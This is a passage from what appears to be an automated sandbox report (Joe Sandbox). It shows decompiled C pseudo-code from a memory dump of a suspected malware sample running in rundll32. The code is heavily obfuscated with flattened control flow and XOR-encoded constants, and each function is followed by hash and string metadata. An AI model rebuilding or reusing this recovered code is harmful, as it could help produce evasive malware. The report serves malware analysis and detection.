                                                                                                                      				_v2752 = _v2752 ^ 0x83185000;
                                                                                                                      				_v2760 = 0xc45920;
                                                                                                                      				_v2760 = _v2760 + 0xffffdf34;
                                                                                                                      				_v2760 = _v2760 >> 0x10;
                                                                                                                      				_v2760 = _v2760 + 0xfa48;
                                                                                                                      				_v2760 = _v2760 ^ 0x00031526;
                                                                                                                      				_v2652 = 0x3af3c9;
                                                                                                                      				_v2652 = _v2652 << 0xf;
                                                                                                                      				_v2652 = _v2652 ^ 0x79efd05d;
                                                                                                                      				_v2660 = 0x38b4f1;
                                                                                                                      				_v2660 = _v2660 ^ 0x7076ccd1;
                                                                                                                      				_v2660 = _v2660 ^ 0x704b934c;
                                                                                                                      				_v2744 = 0x6269bc;
                                                                                                                      				_v2744 = _v2744 | 0xfa5eccfb;
                                                                                                                      				_v2744 = _v2744 * 0x5f;
                                                                                                                      				_v2744 = _v2744 << 0xe;
                                                                                                                      				_v2744 = _v2744 ^ 0x9469f4ee;
                                                                                                                      				_v2676 = 0x941055;
                                                                                                                      				_v2676 = _v2676 | 0xfd7f72ef;
                                                                                                                      				_v2676 = _v2676 ^ 0xfdfef17e;
                                                                                                                      				_v2684 = 0x7199f;
                                                                                                                      				_v2684 = _v2684 + 0x9aa9;
                                                                                                                      				_v2684 = _v2684 << 0xe;
                                                                                                                      				_v2684 = _v2684 ^ 0xed16f6de;
                                                                                                                      				_v2644 = 0xf4560;
                                                                                                                      				_v2644 = _v2644 * 0x1c;
                                                                                                                      				_v2644 = _v2644 ^ 0x01a06f93;
                                                                                                                      				_v2692 = 0x891e84;
                                                                                                                      				_v2692 = _v2692 ^ 0x46454346;
                                                                                                                      				_v2692 = _v2692 | 0x068a2534;
                                                                                                                      				_v2692 = _v2692 ^ 0x46ca9877;
                                                                                                                      				_v2736 = 0x29dfc8;
                                                                                                                      				_t471 = _v2736 * 0x19;
                                                                                                                      				_v2736 = _t471;
                                                                                                                      				_v2736 = _v2736 | 0x3d4578d3;
                                                                                                                      				_v2736 = _v2736 >> 4;
                                                                                                                      				_v2736 = _v2736 ^ 0x03d45238;
                                                                                                                      				while(_t553 != 0x2953b22) {
                                                                                                                      					if(_t553 == 0x422d362) {
                                                                                                                      						_t553 = 0xe704baa;
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						_t565 = _t553 - 0xe704baa;
                                                                                                                      						if(_t553 != 0xe704baa) {
                                                                                                                      							L8:
                                                                                                                      							__eflags = _t553 - 0x740d40c;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							E008306A8(_t500, _v2748, _t565, _v2788, _v2716,  &_v2600);
                                                                                                                      							 *((short*)(E008243A8(_v2720,  &_v2600, _v2688, _v2624))) = 0;
                                                                                                                      							E00817A50(_v2780,  &_v1560, _t565, _v2696);
                                                                                                                      							_push(_v2712);
                                                                                                                      							_push(_v2664);
                                                                                                                      							_push(0x1000181c);
                                                                                                                      							E0081DBCE(E00819F66(_v2756, _v2672, _t565), _t565, _v2704,  &_v2600, _v2756, _v2740, _v2772, _v2680, _v2656,  &_v1560);
                                                                                                                      							E0081A203(_v2628, _v2648, _v2636, _t483);
                                                                                                                      							_t500 = _v2792;
                                                                                                                      							_t471 = E0082B78F(_t500,  &_v2080, _t552, _v2764);
                                                                                                                      							_t558 =  &(_t558[0x15]);
                                                                                                                      							if(_t471 != 0) {
                                                                                                                      								_t553 = 0x2953b22;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t471;
                                                                                                                      				}
                                                                                                                      				_push(_t500);
                                                                                                                      				E0081DE7B( &_v1040, _v2784, _v2640, _t500, _v2732, _v2724, _v2728);
                                                                                                                      				_push(_v2776);
                                                                                                                      				_push(_v2620);
                                                                                                                      				_push(0x1000185c);
                                                                                                                      				E0081DBCE(E00819F66(_v2632, _v2768, __eflags), __eflags, _v2668,  &_v1040, _v2632, _v2700, _v2708, _v2752, _v2760,  &_v2080);
                                                                                                                      				_t503 = _v2652;
                                                                                                                      				E0081A203(_t503, _v2660, _v2744, _t473);
                                                                                                                      				__eflags = 0;
                                                                                                                      				_push(_v2736);
                                                                                                                      				_push(_v2692);
                                                                                                                      				_push(_v2644);
                                                                                                                      				_push(0);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_v2684);
                                                                                                                      				_push(_t503);
                                                                                                                      				_push(0);
                                                                                                                      				_t500 =  &_v520;
                                                                                                                      				_t471 = E00818B00(_t500, _v2676, 0);
                                                                                                                      				_t558 =  &(_t558[0x1c]);
                                                                                                                      				_t553 = 0x740d40c;
                                                                                                                      				goto L8;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 7h$;:$E%$FCEF$Xth$8$x
                                                                                                                      • API String ID: 0-4119786196
                                                                                                                      • Opcode ID: d182f768c3a8ea6f8e5d9de1ae26096572558a5a1966b6f6777450be1622a07a
                                                                                                                      • Instruction ID: 2f4cff0b992a3bd5c1297dbe8523956074db18d9eaaffe4a81f385c75a9aaf2d
                                                                                                                      • Opcode Fuzzy Hash: d182f768c3a8ea6f8e5d9de1ae26096572558a5a1966b6f6777450be1622a07a
                                                                                                                      • Instruction Fuzzy Hash: CB22FFB15093819FD368CF25C94AA8BFBE2FBC5708F10891DE2D986261D7B19949CF13
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0083086E(void* __ecx) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				unsigned int _v36;
                                                                                                                      				unsigned int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				unsigned int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				unsigned int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				void* _t243;
                                                                                                                      				void* _t248;
                                                                                                                      				void* _t253;
                                                                                                                      				void* _t260;
                                                                                                                      				void* _t265;
                                                                                                                      				void* _t270;
                                                                                                                      				void* _t271;
                                                                                                                      				signed int _t273;
                                                                                                                      				signed int _t274;
                                                                                                                      				signed int _t275;
                                                                                                                      				signed int _t276;
                                                                                                                      				signed int _t277;
                                                                                                                      				signed int _t278;
                                                                                                                      				signed int _t279;
                                                                                                                      				void* _t298;
                                                                                                                      				void* _t299;
                                                                                                                      				signed int* _t301;
                                                                                                                      				void* _t309;
                                                                                                                      
                                                                                                                      				_t301 =  &_v104;
                                                                                                                      				_v4 = 0xac6d1;
                                                                                                                      				_v4 = _v4 | 0x81c51043;
                                                                                                                      				_v4 = _v4 ^ 0x81ca09c2;
                                                                                                                      				_v8 = 0xb8d74f;
                                                                                                                      				_v8 = _v8 | 0x3a2284f4;
                                                                                                                      				_v8 = _v8 ^ 0x3ab94f49;
                                                                                                                      				_v12 = 0x56dc2c;
                                                                                                                      				_v12 = _v12 >> 0xf;
                                                                                                                      				_v12 = _v12 ^ 0x0005485d;
                                                                                                                      				_v20 = 0x903a48;
                                                                                                                      				_v20 = _v20 ^ 0xb2572448;
                                                                                                                      				_v20 = _v20 ^ 0xb2cdfeb2;
                                                                                                                      				_v24 = 0x1df316;
                                                                                                                      				_v24 = _v24 * 0x26;
                                                                                                                      				_t271 = __ecx;
                                                                                                                      				_v24 = _v24 ^ 0x04774828;
                                                                                                                      				_t298 = 0;
                                                                                                                      				_v96 = 0x29fbe6;
                                                                                                                      				_t299 = 0x412d246;
                                                                                                                      				_v96 = _v96 << 0xd;
                                                                                                                      				_v96 = _v96 + 0x40e6;
                                                                                                                      				_v96 = _v96 + 0xf8d0;
                                                                                                                      				_v96 = _v96 ^ 0x3f79ed75;
                                                                                                                      				_v28 = 0x5f5eb9;
                                                                                                                      				_v28 = _v28 ^ 0x304beccc;
                                                                                                                      				_v28 = _v28 ^ 0x301ae6f7;
                                                                                                                      				_v16 = 0x707b25;
                                                                                                                      				_v16 = _v16 | 0xc66cf16b;
                                                                                                                      				_v16 = _v16 ^ 0xc674099c;
                                                                                                                      				_v68 = 0x422c76;
                                                                                                                      				_v68 = _v68 >> 5;
                                                                                                                      				_v68 = _v68 ^ 0x51e03a27;
                                                                                                                      				_v68 = _v68 ^ 0x51e925f4;
                                                                                                                      				_v72 = 0x838679;
                                                                                                                      				_t273 = 0x50;
                                                                                                                      				_v72 = _v72 / _t273;
                                                                                                                      				_t274 = 0xb;
                                                                                                                      				_v72 = _v72 / _t274;
                                                                                                                      				_v72 = _v72 ^ 0x0007ebfd;
                                                                                                                      				_v92 = 0x3398da;
                                                                                                                      				_t275 = 0x26;
                                                                                                                      				_v92 = _v92 * 0x6d;
                                                                                                                      				_v92 = _v92 ^ 0x75ca49c7;
                                                                                                                      				_v92 = _v92 << 6;
                                                                                                                      				_v92 = _v92 ^ 0x0c9e0967;
                                                                                                                      				_v48 = 0x734a11;
                                                                                                                      				_v48 = _v48 >> 0xa;
                                                                                                                      				_v48 = _v48 ^ 0x00076871;
                                                                                                                      				_v52 = 0xdc5b30;
                                                                                                                      				_v52 = _v52 ^ 0x2a73247b;
                                                                                                                      				_v52 = _v52 ^ 0x2aa1f0d2;
                                                                                                                      				_v104 = 0x2f7cf6;
                                                                                                                      				_v104 = _v104 / _t275;
                                                                                                                      				_v104 = _v104 * 0x41;
                                                                                                                      				_v104 = _v104 | 0xaae37d31;
                                                                                                                      				_v104 = _v104 ^ 0xaaffffad;
                                                                                                                      				_v56 = 0xefab9e;
                                                                                                                      				_v56 = _v56 >> 9;
                                                                                                                      				_v56 = _v56 ^ 0x0008ac09;
                                                                                                                      				_v80 = 0xd17701;
                                                                                                                      				_t276 = 0x57;
                                                                                                                      				_v80 = _v80 / _t276;
                                                                                                                      				_v80 = _v80 + 0xffff6938;
                                                                                                                      				_v80 = _v80 ^ 0x000bb913;
                                                                                                                      				_v44 = 0x9eed53;
                                                                                                                      				_t277 = 0x32;
                                                                                                                      				_v44 = _v44 * 0x74;
                                                                                                                      				_v44 = _v44 ^ 0x480bdaeb;
                                                                                                                      				_v100 = 0xb1cacc;
                                                                                                                      				_v100 = _v100 ^ 0xb6415150;
                                                                                                                      				_v100 = _v100 / _t277;
                                                                                                                      				_t278 = 0x13;
                                                                                                                      				_v100 = _v100 * 0x1c;
                                                                                                                      				_v100 = _v100 ^ 0x667becf7;
                                                                                                                      				_v84 = 0x7272f5;
                                                                                                                      				_v84 = _v84 | 0x49285dda;
                                                                                                                      				_v84 = _v84 / _t278;
                                                                                                                      				_v84 = _v84 ^ 0x03db0e7b;
                                                                                                                      				_v32 = 0x23e0bb;
                                                                                                                      				_v32 = _v32 ^ 0xc1a40ef0;
                                                                                                                      				_v32 = _v32 ^ 0xc18ab8c7;
                                                                                                                      				_v36 = 0x934e6;
                                                                                                                      				_v36 = _v36 >> 8;
                                                                                                                      				_v36 = _v36 ^ 0x000f952f;
                                                                                                                      				_v76 = 0x57f010;
                                                                                                                      				_t279 = 0x55;
                                                                                                                      				_v76 = _v76 / _t279;
                                                                                                                      				_v76 = _v76 | 0x3f39553c;
                                                                                                                      				_v76 = _v76 ^ 0x3f3ef260;
                                                                                                                      				_v40 = 0x93d6f8;
                                                                                                                      				_v40 = _v40 >> 6;
                                                                                                                      				_v40 = _v40 ^ 0x000a0563;
                                                                                                                      				_v60 = 0x62e666;
                                                                                                                      				_v60 = _v60 ^ 0x6bd8a41b;
                                                                                                                      				_v60 = _v60 * 0x61;
                                                                                                                      				_v60 = _v60 ^ 0xd19d18b1;
                                                                                                                      				_v88 = 0xe2190a;
                                                                                                                      				_v88 = _v88 * 0x56;
                                                                                                                      				_v88 = _v88 << 0x10;
                                                                                                                      				_v88 = _v88 * 0x2c;
                                                                                                                      				_v88 = _v88 ^ 0x1bd8b0be;
                                                                                                                      				_v64 = 0x7df3ba;
                                                                                                                      				_v64 = _v64 >> 3;
                                                                                                                      				_v64 = _v64 << 8;
                                                                                                                      				_v64 = _v64 ^ 0x0fbc3045;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t309 = _t299 - 0x5b9992e;
                                                                                                                      						if(_t309 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t309 == 0) {
                                                                                                                      							_t253 = E00821B4F();
                                                                                                                      							_t301 = _t301 - 0xc + 0xc;
                                                                                                                      							_t299 = 0x4369ff;
                                                                                                                      							_t298 = _t298 + _t253;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t299 == 0x4369ff) {
                                                                                                                      								_t298 = _t298 + E0081AB82(_t271 + 0x1c, _v60, _v88, _v64);
                                                                                                                      							} else {
                                                                                                                      								if(_t299 == 0x240c704) {
                                                                                                                      									_t260 = E00821B4F();
                                                                                                                      									_t301 = _t301 - 0xc + 0xc;
                                                                                                                      									_t299 = 0x5b9992e;
                                                                                                                      									_t298 = _t298 + _t260;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t299 == 0x412d246) {
                                                                                                                      										_t299 = 0x80cf0f0;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t299 != 0x47dcd1e) {
                                                                                                                      											goto L17;
                                                                                                                      										} else {
                                                                                                                      											_t265 = E00821B4F();
                                                                                                                      											_t301 = _t301 - 0xc + 0xc;
                                                                                                                      											_t299 = 0x240c704;
                                                                                                                      											_t298 = _t298 + _t265;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L20:
                                                                                                                      						return _t298;
                                                                                                                      					}
                                                                                                                      					if(_t299 == 0x80cf0f0) {
                                                                                                                      						_t243 = E0081AB82(_t271 + 8, _v4, _v8, _v12);
                                                                                                                      						_t301 =  &(_t301[2]);
                                                                                                                      						_t299 = 0xe2e5f52;
                                                                                                                      						_t298 = _t298 + _t243;
                                                                                                                      						goto L17;
                                                                                                                      					} else {
                                                                                                                      						if(_t299 == 0xa9f5c45) {
                                                                                                                      							_t248 = E00821B4F();
                                                                                                                      							_t301 = _t301 - 0xc + 0xc;
                                                                                                                      							_t299 = 0x47dcd1e;
                                                                                                                      							_t298 = _t298 + _t248;
                                                                                                                      							goto L1;
                                                                                                                      						} else {
                                                                                                                      							if(_t299 != 0xe2e5f52) {
                                                                                                                      								goto L17;
                                                                                                                      							} else {
                                                                                                                      								_t270 = E00821B4F();
                                                                                                                      								_t301 = _t301 - 0xc + 0xc;
                                                                                                                      								_t299 = 0xa9f5c45;
                                                                                                                      								_t298 = _t298 + _t270;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					goto L20;
                                                                                                                      					L17:
                                                                                                                      				} while (_t299 != 0xe1ba840);
                                                                                                                      				goto L20;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %{p$':Q$<U9?$fb$uy?${$s*$4
                                                                                                                      • API String ID: 0-3558008229
                                                                                                                      • Opcode ID: 84da1592223dd1f04f0f3a6d750a6106e25ec91bc4b6139091f670668cf43936
                                                                                                                      • Instruction ID: 6aa1a2c11ff8c726279449f5a4014dabab85cd71ee756e44266e51ce23d744d7
                                                                                                                      • Opcode Fuzzy Hash: 84da1592223dd1f04f0f3a6d750a6106e25ec91bc4b6139091f670668cf43936
                                                                                                                      • Instruction Fuzzy Hash: 3FB121729083818FC358DF69D48A40BFBE1FBD4758F109A2DF4959A220D3B4DA48CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0081F8B8() {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				void* _t191;
                                                                                                                      				signed int _t193;
                                                                                                                      				signed int _t194;
                                                                                                                      				void* _t198;
                                                                                                                      				void* _t219;
                                                                                                                      				intOrPtr _t224;
                                                                                                                      				signed int _t225;
                                                                                                                      				signed int _t226;
                                                                                                                      				signed int _t227;
                                                                                                                      				signed int _t228;
                                                                                                                      				signed int _t229;
                                                                                                                      				signed int _t230;
                                                                                                                      				intOrPtr* _t232;
                                                                                                                      				signed int _t233;
                                                                                                                      				signed int* _t234;
                                                                                                                      
                                                                                                                      				_t234 =  &_v88;
                                                                                                                      				_v12 = 0x2790ea;
                                                                                                                      				_v8 = 0xba5a5c;
                                                                                                                      				_t198 = 0x3d69ab1;
                                                                                                                      				_t224 = 0;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_v60 = 0x2fd7ed;
                                                                                                                      				_v60 = _v60 | 0x771a9d11;
                                                                                                                      				_t225 = 0x45;
                                                                                                                      				_v60 = _v60 * 0x4e;
                                                                                                                      				_v60 = _v60 ^ 0x55773f16;
                                                                                                                      				_v40 = 0xe86db6;
                                                                                                                      				_v40 = _v40 | 0xabe4da9c;
                                                                                                                      				_v40 = _v40 ^ 0xabe3ff81;
                                                                                                                      				_v84 = 0x4e4c43;
                                                                                                                      				_v84 = _v84 + 0x2260;
                                                                                                                      				_v84 = _v84 / _t225;
                                                                                                                      				_t226 = 0x36;
                                                                                                                      				_v84 = _v84 / _t226;
                                                                                                                      				_v84 = _v84 ^ 0x000c99de;
                                                                                                                      				_v36 = 0x2c2e8d;
                                                                                                                      				_v36 = _v36 ^ 0x89bc573f;
                                                                                                                      				_v36 = _v36 ^ 0x899e3850;
                                                                                                                      				_v56 = 0xc456b8;
                                                                                                                      				_v56 = _v56 << 1;
                                                                                                                      				_t227 = 0x7a;
                                                                                                                      				_v56 = _v56 / _t227;
                                                                                                                      				_v56 = _v56 ^ 0x000dd00d;
                                                                                                                      				_v24 = 0x6eec6c;
                                                                                                                      				_v24 = _v24 * 0x67;
                                                                                                                      				_v24 = _v24 ^ 0x2ca24ccd;
                                                                                                                      				_v28 = 0xbd5c18;
                                                                                                                      				_v28 = _v28 + 0xd697;
                                                                                                                      				_v28 = _v28 ^ 0x00bf4353;
                                                                                                                      				_v32 = 0x8ab54f;
                                                                                                                      				_v32 = _v32 * 0x47;
                                                                                                                      				_v32 = _v32 ^ 0x267a3e13;
                                                                                                                      				_v88 = 0x583e0f;
                                                                                                                      				_v88 = _v88 >> 8;
                                                                                                                      				_v88 = _v88 + 0xffff5904;
                                                                                                                      				_v88 = _v88 << 0x10;
                                                                                                                      				_v88 = _v88 ^ 0xb14dc739;
                                                                                                                      				_v44 = 0x7902f;
                                                                                                                      				_v44 = _v44 + 0xffff35ef;
                                                                                                                      				_v44 = _v44 ^ 0x000a0038;
                                                                                                                      				_v64 = 0xab1413;
                                                                                                                      				_v64 = _v64 + 0xffff0fb9;
                                                                                                                      				_v64 = _v64 << 8;
                                                                                                                      				_v64 = _v64 ^ 0xaa2b0b8a;
                                                                                                                      				_v76 = 0x32b087;
                                                                                                                      				_v76 = _v76 | 0x42a79f0a;
                                                                                                                      				_v76 = _v76 ^ 0x7a54616b;
                                                                                                                      				_v76 = _v76 + 0x85;
                                                                                                                      				_v76 = _v76 ^ 0x38e777a2;
                                                                                                                      				_v20 = 0xba9969;
                                                                                                                      				_v20 = _v20 | 0x60b184e2;
                                                                                                                      				_v20 = _v20 ^ 0x60bd1ab4;
                                                                                                                      				_v52 = 0x531ceb;
                                                                                                                      				_v52 = _v52 ^ 0x8fc4675a;
                                                                                                                      				_v52 = _v52 >> 2;
                                                                                                                      				_v52 = _v52 ^ 0x23e32c7b;
                                                                                                                      				_v80 = 0xb054c0;
                                                                                                                      				_t228 = 0x5b;
                                                                                                                      				_v80 = _v80 / _t228;
                                                                                                                      				_v80 = _v80 << 1;
                                                                                                                      				_v80 = _v80 + 0xffffcecb;
                                                                                                                      				_v80 = _v80 ^ 0x0007d204;
                                                                                                                      				_v16 = 0x58f1c6;
                                                                                                                      				_v16 = _v16 ^ 0x8ee10e17;
                                                                                                                      				_v16 = _v16 ^ 0x8ebef1bd;
                                                                                                                      				_v68 = 0x312414;
                                                                                                                      				_t229 = 0x7b;
                                                                                                                      				_t233 = _v16;
                                                                                                                      				_v68 = _v68 / _t229;
                                                                                                                      				_v68 = _v68 + 0x1b34;
                                                                                                                      				_v68 = _v68 >> 2;
                                                                                                                      				_v68 = _v68 ^ 0x00095176;
                                                                                                                      				_t197 = _v16;
                                                                                                                      				_t230 = _v16;
                                                                                                                      				_v72 = 0xc0cd63;
                                                                                                                      				_v72 = _v72 | 0x9a162f11;
                                                                                                                      				_v72 = _v72 << 3;
                                                                                                                      				_v72 = _v72 * 0x12;
                                                                                                                      				_v72 = _v72 ^ 0x18eea785;
                                                                                                                      				_v48 = 0xaed007;
                                                                                                                      				_v48 = _v48 ^ 0x406d7cc3;
                                                                                                                      				_v48 = _v48 << 3;
                                                                                                                      				_v48 = _v48 ^ 0x061a7dff;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t219 = 0x5c;
                                                                                                                      					while(1) {
                                                                                                                      						L2:
                                                                                                                      						do {
                                                                                                                      							L3:
                                                                                                                      							while(_t198 != 0x2c774a6) {
                                                                                                                      								if(_t198 == 0x3d69ab1) {
                                                                                                                      									_t198 = 0x526c216;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t198 == 0x4efcef6) {
                                                                                                                      										E0082DA89(_v76, _v20, _v52, _t233, _v80);
                                                                                                                      										_t234 =  &(_t234[3]);
                                                                                                                      										_t198 = 0x2c774a6;
                                                                                                                      										goto L1;
                                                                                                                      									} else {
                                                                                                                      										if(_t198 == 0x526c216) {
                                                                                                                      											_t232 =  *0x1002520c + 0x220;
                                                                                                                      											while( *_t232 != _t219) {
                                                                                                                      												_t232 = _t232 + 2;
                                                                                                                      											}
                                                                                                                      											_t230 = _t232 + 2;
                                                                                                                      											_t198 = 0xb318200;
                                                                                                                      											goto L2;
                                                                                                                      										} else {
                                                                                                                      											if(_t198 == 0x54b01d8) {
                                                                                                                      												_t193 = E00812296(_v56, _v24, _v28, _v60, _v32, _t230, _t197);
                                                                                                                      												_t234 =  &(_t234[5]);
                                                                                                                      												_t233 = _t193;
                                                                                                                      												_t191 = 0xe4f0407;
                                                                                                                      												_t198 =  !=  ? 0xe4f0407 : 0x2c774a6;
                                                                                                                      												_t219 = 0x5c;
                                                                                                                      												continue;
                                                                                                                      											} else {
                                                                                                                      												if(_t198 == 0xb318200) {
                                                                                                                      													_t194 = E0081DF36(_v84, _v36, _t198, _v40);
                                                                                                                      													_t197 = _t194;
                                                                                                                      													_t234 =  &(_t234[3]);
                                                                                                                      													if(_t194 != 0) {
                                                                                                                      														_t198 = 0x54b01d8;
                                                                                                                      														while(1) {
                                                                                                                      															L1:
                                                                                                                      															_t219 = 0x5c;
                                                                                                                      															goto L2;
                                                                                                                      														}
                                                                                                                      													}
                                                                                                                      												} else {
                                                                                                                      													if(_t198 != _t191) {
                                                                                                                      														goto L21;
                                                                                                                      													} else {
                                                                                                                      														E0081BA7D(_t233, _v88, _v44, _v64);
                                                                                                                      														_t224 =  !=  ? 1 : _t224;
                                                                                                                      														_t198 = 0x4efcef6;
                                                                                                                      														while(1) {
                                                                                                                      															L1:
                                                                                                                      															_t219 = 0x5c;
                                                                                                                      															L2:
                                                                                                                      															goto L3;
                                                                                                                      														}
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								goto L22;
                                                                                                                      							}
                                                                                                                      							E0082DA89(_v16, _v68, _v72, _t197, _v48);
                                                                                                                      							_t234 =  &(_t234[3]);
                                                                                                                      							_t198 = 0xc9e12b8;
                                                                                                                      							_t191 = 0xe4f0407;
                                                                                                                      							_t219 = 0x5c;
                                                                                                                      							L21:
                                                                                                                      						} while (_t198 != 0xc9e12b8);
                                                                                                                      						L22:
                                                                                                                      						return _t224;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x0081fad5
                                                                                                                      0x0081fad8
                                                                                                                      0x0081fadc
                                                                                                                      0x0081fae0
                                                                                                                      0x0081fae8
                                                                                                                      0x0081faed
                                                                                                                      0x0081faf5
                                                                                                                      0x0081faf9
                                                                                                                      0x0081fafd
                                                                                                                      0x0081fb05
                                                                                                                      0x0081fb0d
                                                                                                                      0x0081fb17
                                                                                                                      0x0081fb1b
                                                                                                                      0x0081fb23
                                                                                                                      0x0081fb2b
                                                                                                                      0x0081fb33
                                                                                                                      0x0081fb38
                                                                                                                      0x0081fb40
                                                                                                                      0x0081fb40
                                                                                                                      0x0081fb42
                                                                                                                      0x0081fb43
                                                                                                                      0x0081fb43
                                                                                                                      0x0081fb48
                                                                                                                      0x00000000
                                                                                                                      0x0081fb48
                                                                                                                      0x0081fb5a
                                                                                                                      0x0081fc5a
                                                                                                                      0x00000000
                                                                                                                      0x0081fb60
                                                                                                                      0x0081fb66
                                                                                                                      0x0081fc48
                                                                                                                      0x0081fc4d
                                                                                                                      0x0081fc50
                                                                                                                      0x00000000
                                                                                                                      0x0081fb6c
                                                                                                                      0x0081fb72
                                                                                                                      0x0081fc1a
                                                                                                                      0x0081fc25
                                                                                                                      0x0081fc22
                                                                                                                      0x0081fc22
                                                                                                                      0x0081fc2a
                                                                                                                      0x0081fc2d
                                                                                                                      0x00000000
                                                                                                                      0x0081fb78
                                                                                                                      0x0081fb7e
                                                                                                                      0x0081fbf3
                                                                                                                      0x0081fbf8
                                                                                                                      0x0081fbfb
                                                                                                                      0x0081fc04
                                                                                                                      0x0081fc09
                                                                                                                      0x0081fc0e
                                                                                                                      0x00000000
                                                                                                                      0x0081fb80
                                                                                                                      0x0081fb86
                                                                                                                      0x0081fbc1
                                                                                                                      0x0081fbc6
                                                                                                                      0x0081fbc8
                                                                                                                      0x0081fbcd
                                                                                                                      0x0081fbd3
                                                                                                                      0x0081fb40
                                                                                                                      0x0081fb40
                                                                                                                      0x0081fb42
                                                                                                                      0x00000000
                                                                                                                      0x0081fb42
                                                                                                                      0x0081fb40
                                                                                                                      0x0081fb88
                                                                                                                      0x0081fb8a
                                                                                                                      0x00000000
                                                                                                                      0x0081fb90
                                                                                                                      0x0081fb9e
                                                                                                                      0x0081fbaa
                                                                                                                      0x0081fbad
                                                                                                                      0x0081fb40
                                                                                                                      0x0081fb40
                                                                                                                      0x0081fb42
                                                                                                                      0x0081fb43
                                                                                                                      0x00000000
                                                                                                                      0x0081fb43
                                                                                                                      0x0081fb40
                                                                                                                      0x0081fb8a
                                                                                                                      0x0081fb86
                                                                                                                      0x0081fb7e
                                                                                                                      0x0081fb72
                                                                                                                      0x0081fb66
                                                                                                                      0x00000000
                                                                                                                      0x0081fb5a
                                                                                                                      0x0081fc75
                                                                                                                      0x0081fc7a
                                                                                                                      0x0081fc7d
                                                                                                                      0x0081fc82
                                                                                                                      0x0081fc89
                                                                                                                      0x0081fc8a
                                                                                                                      0x0081fc8a
                                                                                                                      0x0081fc96
                                                                                                                      0x0081fc9f
                                                                                                                      0x0081fc9f
                                                                                                                      0x0081fb43

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8$CLN$`"$kaTz$ln$vQ${,#
                                                                                                                      • API String ID: 0-3310206870
                                                                                                                      • Opcode ID: 8248eef8b54e5ecb354579a418a4a3fa70159f394bf7605922f3802dd578227e
